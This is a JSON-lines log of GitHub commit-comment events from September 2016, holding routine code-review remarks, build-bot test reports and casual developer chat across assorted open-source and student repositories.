{"id":"4600388619","type":"CommitCommentEvent","actor":{"login":"prusswan"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19124831,"position":null,"line":null,"path":null,"commit_id":"530c7c75072ff70e68461a9a2c7636dd0451a354","created_at":"2016-09-22T04:43:43Z","updated_at":"2016-09-22T04:43:43Z","body":"This is causing issue similar to #5318 "}},"created_at":"2016-09-22T04:43:43Z"}
{"id":"4600389039","type":"CommitCommentEvent","actor":{"login":"ben-manes"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19124833,"position":268,"line":268,"path":"src/com/dotmarketing/business/cache/provider/caffine/CaffineCache.java","commit_id":"9595ded9bddfdcd11349664bc2801ecc68b0cdfa","created_at":"2016-09-22T04:43:54Z","updated_at":"2016-09-22T04:43:54Z","body":"I'd recommend removing this since the Guava provider doesn't use it. Soft references cause poor GC performance and a good sizing is always preferred, if possible."}},"created_at":"2016-09-22T04:43:54Z"}
{"id":"4600389071","type":"CommitCommentEvent","actor":{"login":"bitwalker"},"repo":{"name":"bitwalker/exirc"},"payload":{"comment":{"id":19124834,"position":null,"line":null,"path":null,"commit_id":"daf1bef3a4dca08fdd589d2980a52a09883251f2","created_at":"2016-09-22T04:43:55Z","updated_at":"2016-09-22T04:43:55Z","body":"Haha I know that itch, and if your urge drives you to actually implementing one, I would surely use it here :)"}},"created_at":"2016-09-22T04:43:55Z"}
{"id":"4600390152","type":"CommitCommentEvent","actor":{"login":"tischi"},"repo":{"name":"hmbotelho/shinyHTM"},"payload":{"comment":{"id":19124836,"position":null,"line":null,"path":null,"commit_id":"fc06476c80eced6cb9825aaf648d591fe3e930ca","created_at":"2016-09-22T04:44:23Z","updated_at":"2016-09-22T04:44:23Z","body":"thanks!\r\n"}},"created_at":"2016-09-22T04:44:23Z"}
{"id":"4600393430","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124845,"position":null,"line":null,"path":null,"commit_id":"4bdc98f23f43f30ccc637e47e255f278fcdc4a5e","created_at":"2016-09-22T04:45:50Z","updated_at":"2016-09-22T04:45:50Z","body":"Ah! I'm still learning too (as of today), are you saying you would or wouldn't want __print__ to be redirected?\r\n"}},"created_at":"2016-09-22T04:45:50Z"}
{"id":"4600394372","type":"CommitCommentEvent","actor":{"login":"winniex1"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124848,"position":63,"line":84,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T04:46:16Z","updated_at":"2016-09-22T04:46:16Z","body":"Yes, agree it. Will do soon."}},"created_at":"2016-09-22T04:46:16Z"}
{"id":"4600394561","type":"CommitCommentEvent","actor":{"login":"pmasrani"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124849,"position":67,"line":87,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T04:46:21Z","updated_at":"2016-09-22T04:46:21Z","body":"I agree. Not everything needs to be loaded from sampleProp.conf. Anyway it is just an example of how things can be done. For simulated functions, showing how the name can be passed makes sense. For functions collecting specific data like CPU utilization, we can hard-code in the example."}},"created_at":"2016-09-22T04:46:21Z"}
{"id":"4600399042","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124863,"position":null,"line":null,"path":null,"commit_id":"4bdc98f23f43f30ccc637e47e255f278fcdc4a5e","created_at":"2016-09-22T04:48:22Z","updated_at":"2016-09-22T04:48:22Z","body":"Honestly, I could go either way. Seems like the easiest way to get this done.\r\n\r\nOr do something like:\r\n\r\n```python\r\ndef __print__(*args, **kwargs):\r\n    with plock:\r\n        if kwargs.get('level', 0) >= self.debug_level:\r\n            print(*args)\r\n        logging.print_equivalent(*args)\r\n```"}},"created_at":"2016-09-22T04:48:22Z"}
{"id":"4600400038","type":"CommitCommentEvent","actor":{"login":"thanhthai3010"},"repo":{"name":"thanhthai3010/SentimentAndLDAService"},"payload":{"comment":{"id":19124865,"position":13,"line":72,"path":"src/main/java/app/process/lda/LDAProcess.java","commit_id":"ad72a7c39f4bf4064038a8165dbd33a04a579a6b","created_at":"2016-09-22T04:48:48Z","updated_at":"2016-09-22T04:48:48Z","body":"increase iteration value"}},"created_at":"2016-09-22T04:48:48Z"}
{"id":"4600402681","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124874,"position":null,"line":null,"path":null,"commit_id":"650812d93734602d1b26a65b29224e24334c8061","created_at":"2016-09-22T04:50:03Z","updated_at":"2016-09-22T04:50:03Z","body":"1. I hear you and agree,\r\n2. I'd ask why you fell that way, and what's the goal?"}},"created_at":"2016-09-22T04:50:03Z"}
{"id":"4600406282","type":"CommitCommentEvent","actor":{"login":"winniex1"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124885,"position":64,"line":75,"path":"examples/dell5k_system_graphite.py","commit_id":"05d04d78aff9615e04caa1922579774f598821cb","created_at":"2016-09-22T04:51:39Z","updated_at":"2016-09-22T04:51:39Z","body":"You can see previously I used old format. had thought new format can make each argument clearer. The new format is permitted in python. But now some sort of agree that it may take too many lines. If consider we might have more metrics, this might not be a good way. will change it back."}},"created_at":"2016-09-22T04:51:39Z"}
{"id":"4600409944","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124890,"position":null,"line":null,"path":null,"commit_id":"650812d93734602d1b26a65b29224e24334c8061","created_at":"2016-09-22T04:53:18Z","updated_at":"2016-09-22T04:53:18Z","body":"The base classes all leverage each other. It makes sense to keep them together, because BaseSocket *can't work* without BaseDaemon or BaseConnection.\r\n\r\nIf they weren't so circular, I could see where you're coming from, but because they're so darn related, it doesn't make much sense to me to keep them in different files.\r\n\r\nThe parser/message objects, on the other hand. I'm totally cool with those being in a different file. Turns out that even though they're passed around here, they're not essential. Far as this class set is concerned, those are black boxes. They could be replaced with any sort of underlying parser and everything would be fine.\r\n\r\nOn the other hand, minor changes to BaseDaemon have the potential to absolutely break BaseSocket."}},"created_at":"2016-09-22T04:53:18Z"}
{"id":"4600414418","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124908,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T04:55:20Z","updated_at":"2016-09-22T04:55:20Z","body":"Lol. and on a large scale I don't understand all the working parts yet. I'm trying to get more tests before I start bending/breaking things.\r\n[As an aside, not doing work in the constructor makes it easier to test. ](https://youtu.be/wEhu57pih5w?t=100)"}},"created_at":"2016-09-22T04:55:20Z"}
{"id":"4600416532","type":"CommitCommentEvent","actor":{"login":"bcardiff"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19124912,"position":7,"line":169,"path":"src/time/format/parser.cr","commit_id":"026f632f6d417a64f20eb49756d95bfb7a78bbe3","created_at":"2016-09-22T04:56:19Z","updated_at":"2016-09-22T04:56:19Z","body":"🔍 Either the ivar name or the comment is wrong. \r\n@millisecond vs Time  only has *micro*second precision.\r\n"}},"created_at":"2016-09-22T04:56:19Z"}
{"id":"4600417173","type":"CommitCommentEvent","actor":{"login":"shackoon"},"repo":{"name":"shackoon/oose_0324033"},"payload":{"comment":{"id":19124917,"position":1,"line":1,"path":"README.md","commit_id":"cec3b3a087c54e449167f27c01e64843e9bb5d74","created_at":"2016-09-22T04:56:40Z","updated_at":"2016-09-22T04:56:40Z","body":"資管2A\r\n0324033\r\n翁崇軒"}},"created_at":"2016-09-22T04:56:40Z"}
{"id":"4600421501","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124928,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T04:58:39Z","updated_at":"2016-09-22T04:58:39Z","body":"Not sure what you're referring to specifically. I do try to avoid that though. The only place where it does serious lifting in the constructor is in the parser object, but that's in a factory function, not a constructor.\r\n\r\nAnyhow, if you want me to explain the working parts, I'm more than happy to do so. If you wanted to meet in the lab sometime tomorrow?"}},"created_at":"2016-09-22T04:58:39Z"}
{"id":"4600424250","type":"CommitCommentEvent","actor":{"login":"WoefulDerelict"},"repo":{"name":"trueos/lumina"},"payload":{"comment":{"id":19124933,"position":null,"line":null,"path":null,"commit_id":"e24b7b3f822a55aa8210ed21d50349147426f7a3","created_at":"2016-09-22T04:59:52Z","updated_at":"2016-09-22T04:59:52Z","body":"This does appear to resolve the issue where lumina-desktop's memory footprint continued to grow in size after launch. \r\n\r\nhttps://github.com/trueos/lumina/issues/266"}},"created_at":"2016-09-22T04:59:52Z"}
{"id":"4600424778","type":"CommitCommentEvent","actor":{"login":"zhoujinfeng"},"repo":{"name":"zhoujinfeng/demo"},"payload":{"comment":{"id":19124934,"position":null,"line":null,"path":null,"commit_id":"9754f73b392883f4a9bb46995c74b4268df0a789","created_at":"2016-09-22T05:00:04Z","updated_at":"2016-09-22T05:00:04Z","body":"time"}},"created_at":"2016-09-22T05:00:04Z"}
{"id":"4600424950","type":"CommitCommentEvent","actor":{"login":"alee"},"repo":{"name":"comses/miracle"},"payload":{"comment":{"id":19124935,"position":null,"line":null,"path":null,"commit_id":"00b18217779636548bd2641b57c28269ef5c1de4","created_at":"2016-09-22T05:00:08Z","updated_at":"2016-09-22T05:00:08Z","body":"Hitting the shiny site after exposing it fully brings up 500 errors. Worse, /var/log/shiny-server.log and /var/log/shiny-server are all empty. Any ideas on how to troubleshoot?"}},"created_at":"2016-09-22T05:00:08Z"}
{"id":"4600425584","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/packages_apps_Settings"},"payload":{"comment":{"id":19124938,"position":null,"line":null,"path":null,"commit_id":"71d9ff4b7c42c459976202d83e1c8114ea751eb4","created_at":"2016-09-22T05:00:22Z","updated_at":"2016-09-22T05:00:22Z","body":"Don't you say"}},"created_at":"2016-09-22T05:00:22Z"}
{"id":"4600426314","type":"CommitCommentEvent","actor":{"login":"litianlongcrt"},"repo":{"name":"litianlongcrt/crt"},"payload":{"comment":{"id":19124940,"position":2,"line":2,"path":"README.md","commit_id":"e3d055279e7d8fb86036b19abebe5642fa41f172","created_at":"2016-09-22T05:00:39Z","updated_at":"2016-09-22T05:00:39Z","body":"222"}},"created_at":"2016-09-22T05:00:39Z"}
{"id":"4600431239","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124949,"position":null,"line":null,"path":null,"commit_id":"4bdc98f23f43f30ccc637e47e255f278fcdc4a5e","created_at":"2016-09-22T05:02:48Z","updated_at":"2016-09-22T05:02:48Z","body":"ah okay. and if you're unsure how to see the logging, they show up on `py.test` but only if the test failed. http://i.imgur.com/GSfwM6r.png"}},"created_at":"2016-09-22T05:02:48Z"}
{"id":"4600434468","type":"CommitCommentEvent","actor":{"login":"bfrggit"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124950,"position":64,"line":75,"path":"examples/dell5k_system_graphite.py","commit_id":"05d04d78aff9615e04caa1922579774f598821cb","created_at":"2016-09-22T05:04:13Z","updated_at":"2016-09-22T05:04:13Z","body":"Both look good... I vote for the new one (if I can vote :-)"}},"created_at":"2016-09-22T05:04:13Z"}
{"id":"4600434918","type":"CommitCommentEvent","actor":{"login":"erzongcai"},"repo":{"name":"erzongcai/robot"},"payload":{"comment":{"id":19124953,"position":null,"line":null,"path":null,"commit_id":"91924b48eacf38f56fb6a0043e23085df5d7085b","created_at":"2016-09-22T05:04:27Z","updated_at":"2016-09-22T05:04:27Z","body":"it is good!"}},"created_at":"2016-09-22T05:04:27Z"}
{"id":"4600435362","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124954,"position":null,"line":null,"path":null,"commit_id":"3282e244d53fca3da36869bd607acb99911907e2","created_at":"2016-09-22T05:04:40Z","updated_at":"2016-09-22T05:04:40Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1195 of 1195 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.13%25-green.svg)</a>\n"}},"created_at":"2016-09-22T05:04:40Z"}
{"id":"4600438300","type":"CommitCommentEvent","actor":{"login":"bfrggit"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124963,"position":5,"line":56,"path":"liota/core/package_manager.py","commit_id":"05d04d78aff9615e04caa1922579774f598821cb","created_at":"2016-09-22T05:06:04Z","updated_at":"2016-09-22T05:06:04Z","body":"I tend to keep `MainThread`. This part of code happens only if somebody runs PackageManager as MainThread."}},"created_at":"2016-09-22T05:06:04Z"}
{"id":"4600438659","type":"CommitCommentEvent","actor":{"login":"bfrggit"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124965,"position":17,"line":68,"path":"liota/core/package_manager.py","commit_id":"05d04d78aff9615e04caa1922579774f598821cb","created_at":"2016-09-22T05:06:14Z","updated_at":"2016-09-22T05:06:14Z","body":"Same."}},"created_at":"2016-09-22T05:06:14Z"}
{"id":"4600438684","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/system_core"},"payload":{"comment":{"id":19124966,"position":4,"line":13,"path":"rootdir/init.rc","commit_id":"423edcd02d6b46347fed266a26d92103cfa7020b","created_at":"2016-09-22T05:06:15Z","updated_at":"2016-09-22T05:06:15Z","body":"We don't have this @1KX2, something is wrong here"}},"created_at":"2016-09-22T05:06:15Z"}
{"id":"4600439281","type":"CommitCommentEvent","actor":{"login":"pmasrani"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124972,"position":64,"line":75,"path":"examples/dell5k_system_graphite.py","commit_id":"05d04d78aff9615e04caa1922579774f598821cb","created_at":"2016-09-22T05:06:30Z","updated_at":"2016-09-22T05:06:30Z","body":"I agree with Charles. Keep the new one, it is more readable."}},"created_at":"2016-09-22T05:06:30Z"}
{"id":"4600439524","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124973,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T05:06:37Z","updated_at":"2016-09-22T05:06:37Z","body":"it would have to be after 4pm or after 2pm on Friday"}},"created_at":"2016-09-22T05:06:37Z"}
{"id":"4600445564","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124981,"position":null,"line":null,"path":null,"commit_id":"831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1","created_at":"2016-09-22T05:08:58Z","updated_at":"2016-09-22T05:08:58Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1785 of 1785 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T05:08:58Z"}
{"id":"4600446282","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124986,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T05:09:18Z","updated_at":"2016-09-22T05:09:18Z","body":"Friday it is then. I've got Discrete at 4. Unless you're willing to stay until 6?"}},"created_at":"2016-09-22T05:09:18Z"}
{"id":"4600447415","type":"CommitCommentEvent","actor":{"login":"calvinbui"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19124988,"position":null,"line":null,"path":null,"commit_id":"530c7c75072ff70e68461a9a2c7636dd0451a354","created_at":"2016-09-22T05:09:50Z","updated_at":"2016-09-22T05:09:50Z","body":"Confirmed issue with clean repo"}},"created_at":"2016-09-22T05:09:50Z"}
{"id":"4600452073","type":"CommitCommentEvent","actor":{"login":"hxim"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19125000,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T05:12:03Z","updated_at":"2016-09-22T05:12:03Z","body":"Is reason why was this added no longer valid? see commit notes here:\r\nhttps://github.com/official-stockfish/Stockfish/commit/ffedfa33542a7de7d87fd545ea0a4b2fef8f8c6e"}},"created_at":"2016-09-22T05:12:03Z"}
{"id":"4600452958","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125002,"position":null,"line":null,"path":null,"commit_id":"831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1","created_at":"2016-09-22T05:12:29Z","updated_at":"2016-09-22T05:12:29Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T05:12:29Z"}
{"id":"4600455964","type":"CommitCommentEvent","actor":{"login":"nicepersonniceperson"},"repo":{"name":"nicepersonniceperson/mail"},"payload":{"comment":{"id":19125006,"position":1,"line":1,"path":"readme.txt","commit_id":"14f86a1fb111c98440a77111a7ad7b686e4ec8c7","created_at":"2016-09-22T05:13:52Z","updated_at":"2016-09-22T05:13:52Z","body":"f"}},"created_at":"2016-09-22T05:13:52Z"}
{"id":"4600456094","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19125007,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T05:13:56Z","updated_at":"2016-09-22T05:13:56Z","body":"Oh, and before I forget, [waffle.io](https://waffle.io/gappleto97/p2p-project) is a super awesome issue tracker that I'm using for this."}},"created_at":"2016-09-22T05:13:56Z"}
{"id":"4600459695","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19125016,"position":null,"line":null,"path":null,"commit_id":"650812d93734602d1b26a65b29224e24334c8061","created_at":"2016-09-22T05:15:39Z","updated_at":"2016-09-22T05:15:39Z","body":"Yeah I can agree with that. I come from a background of one class per file, but they are pretty related.\r\nSpit balling filenames:\r\n\r\n- BaseNetwork"}},"created_at":"2016-09-22T05:15:39Z"}
{"id":"4600460654","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19125019,"position":64,"line":75,"path":"examples/dell5k_system_graphite.py","commit_id":"05d04d78aff9615e04caa1922579774f598821cb","created_at":"2016-09-22T05:16:05Z","updated_at":"2016-09-22T05:16:05Z","body":"Okay, we can go ahead with the new format then. But add an extra blank line after line number 75 as it shows an illegal ending of the file."}},"created_at":"2016-09-22T05:16:05Z"}
{"id":"4600463626","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19125025,"position":null,"line":null,"path":null,"commit_id":"650812d93734602d1b26a65b29224e24334c8061","created_at":"2016-09-22T05:17:25Z","updated_at":"2016-09-22T05:17:25Z","body":"I'd be cool with something like that. I'm probably going to insist on the network schemas being single word filenames though. So stuff like:\r\n\r\n* mesh.py\r\n* kademlia.py\r\n* chord.py\r\n* etc..."}},"created_at":"2016-09-22T05:17:25Z"}
{"id":"4600468117","type":"CommitCommentEvent","actor":{"login":"Voldemaras"},"repo":{"name":"Voldemaras/phpprobidmods"},"payload":{"comment":{"id":19125030,"position":null,"line":null,"path":null,"commit_id":"b34acd4eab79a24aa441d1888880108dc2832a23","created_at":"2016-09-22T05:19:36Z","updated_at":"2016-09-22T05:19:36Z","body":"i forgot about it:))\n\n> it is a pity that an empty repository\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/Voldemaras/phpprobidmods/commit/b34acd4eab79a24aa441d1888880108dc2832a23#commitcomment-19116786>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AF9GHg5C6LNVgqRMpA9eHMJpobLiFgbrks5qsV3ugaJpZM4KDBX7>.\n>\n\n"}},"created_at":"2016-09-22T05:19:36Z"}
{"id":"4600468542","type":"CommitCommentEvent","actor":{"login":"sfwn"},"repo":{"name":"chinaHewei/TODOProjectInWechat"},"payload":{"comment":{"id":19125032,"position":null,"line":null,"path":null,"commit_id":"d63236dc74e59de772f34861ae1b03160fd9d09b","created_at":"2016-09-22T05:19:49Z","updated_at":"2016-09-22T05:19:49Z","body":"佳"}},"created_at":"2016-09-22T05:19:49Z"}
{"id":"4600469413","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19125033,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T05:20:16Z","updated_at":"2016-09-22T05:20:16Z","body":"And while this might be a bit more technical, and start a bit too quickly than your looking for, I do have some [protocol documentation](https://gappleto97.github.io/p2p-project/protocol/goals.html) set up. The first long while is talking about serialization and the like. The last section under protocol is about the mesh schema specifically."}},"created_at":"2016-09-22T05:20:16Z"}
{"id":"4600470695","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19125035,"position":5,"line":5,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-22T05:20:52Z","updated_at":"2016-09-22T05:20:52Z","body":"No, I meant, I'm not sure how to create indefinite number of lists.\r\nFor example, I would normally do like.\r\na = [ ]\r\n a.append(item1)\r\ntemp.append(a)\r\nbut then, I don't know how many (a)s to make, if I edit a, then temp is going to change as well, I can't hard code the number of lists inside temp, but if I make it a dictionary, I can just keep adding keys until the end of line. Is there a way to make different number of lists depending on the input?"}},"created_at":"2016-09-22T05:20:52Z"}
{"id":"4600472901","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19125042,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T05:21:58Z","updated_at":"2016-09-22T05:21:58Z","body":"See ya Friday. and interesting, I'll try to read some of this!"}},"created_at":"2016-09-22T05:21:58Z"}
{"id":"4600476427","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19125051,"position":67,"line":87,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T05:23:46Z","updated_at":"2016-09-22T05:23:46Z","body":"In general, we should simplify sampleProp.conf for user as of now for every new object we have to create a new entry Gateway1Name, Gateway2Name...etc. It should be an array or a list in order to simplify making an entry something like GatewayPropertyList. "}},"created_at":"2016-09-22T05:23:46Z"}
{"id":"4600477214","type":"CommitCommentEvent","actor":{"login":"Haker32"},"repo":{"name":"rovo89/XposedTools"},"payload":{"comment":{"id":19125055,"position":15,"line":89,"path":"build.pl","commit_id":"bd59e91f6cacc45735521d415b76d7b6308550c8","created_at":"2016-09-22T05:24:10Z","updated_at":"2016-09-22T05:24:10Z","body":"Komandosmarek@gmail.com "}},"created_at":"2016-09-22T05:24:10Z"}
{"id":"4600479934","type":"CommitCommentEvent","actor":{"login":"soninob"},"repo":{"name":"eedevops/shipyard"},"payload":{"comment":{"id":19125060,"position":18,"line":246,"path":"model/registry/v2/registry.go","commit_id":"9bf0a6f5e649492a521de9bbf8bcfec8f25bc767","created_at":"2016-09-22T05:25:23Z","updated_at":"2016-09-22T05:25:23Z","body":"@AndreeaDora - all in all, it looks good. To minimized the call that we are doing, I would suggest displaying the result with paging, show only first 10 images (and do the additional calls only for these 10."}},"created_at":"2016-09-22T05:25:23Z"}
{"id":"4600481906","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19125067,"position":null,"line":null,"path":null,"commit_id":"8764fb9e814af6ff02858cb0c970767bdbd4af2e","created_at":"2016-09-22T05:26:22Z","updated_at":"2016-09-22T05:26:22Z","body":"Maybe open github issue.. \r\nAnd don't use @names in commits that are expected to be rebased multiple times/edit commit message eventually.. "}},"created_at":"2016-09-22T05:26:22Z"}
{"id":"4600482660","type":"CommitCommentEvent","actor":{"login":"soninob"},"repo":{"name":"eedevops/shipyard"},"payload":{"comment":{"id":19125069,"position":null,"line":null,"path":null,"commit_id":"9bf0a6f5e649492a521de9bbf8bcfec8f25bc767","created_at":"2016-09-22T05:26:43Z","updated_at":"2016-09-22T05:26:43Z","body":"@AndreeaDora - please create a PR for it, and later, please deal with the comment, we can create another PR for minimizing the additional calls. "}},"created_at":"2016-09-22T05:26:43Z"}
{"id":"4600483463","type":"CommitCommentEvent","actor":{"login":"pmasrani"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19125071,"position":67,"line":87,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T05:27:07Z","updated_at":"2016-09-22T05:27:07Z","body":"Agreed. sampleProp.conf is not looking good. Should we create multiple versions of the same? A simple one for simple examples and if the example is complex, it will have its own sampleProp.conf? It need not be a conf file only, we can even provide examples of json or yml files."}},"created_at":"2016-09-22T05:27:07Z"}
{"id":"4600484642","type":"CommitCommentEvent","actor":{"login":"Silver-Void"},"repo":{"name":"Silver-Void/TheCodeSpace"},"payload":{"comment":{"id":19125075,"position":null,"line":null,"path":null,"commit_id":"d0e161d698889ecdf60c36a13034f9f0da086f7c","created_at":"2016-09-22T05:27:39Z","updated_at":"2016-09-22T05:27:39Z","body":"I just noticed some 'bugs'. I have to fix the links that the drop down refers to. I'll do that later today."}},"created_at":"2016-09-22T05:27:39Z"}
{"id":"4600485541","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19125078,"position":null,"line":null,"path":null,"commit_id":"42e7a7b3129d5536aefdcea355330f7d6971a630","created_at":"2016-09-22T05:28:07Z","updated_at":"2016-09-22T05:28:07Z","body":"took time ^^ but it is part of your work also ! @viciousviper ! Ty !"}},"created_at":"2016-09-22T05:28:07Z"}
{"id":"4600486635","type":"CommitCommentEvent","actor":{"login":"ryannathans"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19125084,"position":null,"line":null,"path":null,"commit_id":"b84e1231c969debe387fad3b5ee924cb56824e0b","created_at":"2016-09-22T05:28:38Z","updated_at":"2016-09-22T05:28:38Z","body":"does this resolve #2269 "}},"created_at":"2016-09-22T05:28:38Z"}
{"id":"4600488257","type":"CommitCommentEvent","actor":{"login":"bin248163"},"repo":{"name":"bin248163/ss-tab"},"payload":{"comment":{"id":19125090,"position":3,"line":3,"path":"README.md","commit_id":"49544c34a718b977225978b0ea7daa815cdbec63","created_at":"2016-09-22T05:29:25Z","updated_at":"2016-09-22T05:29:25Z","body":"[My blog](http://www.yzb123.top/)"}},"created_at":"2016-09-22T05:29:25Z"}
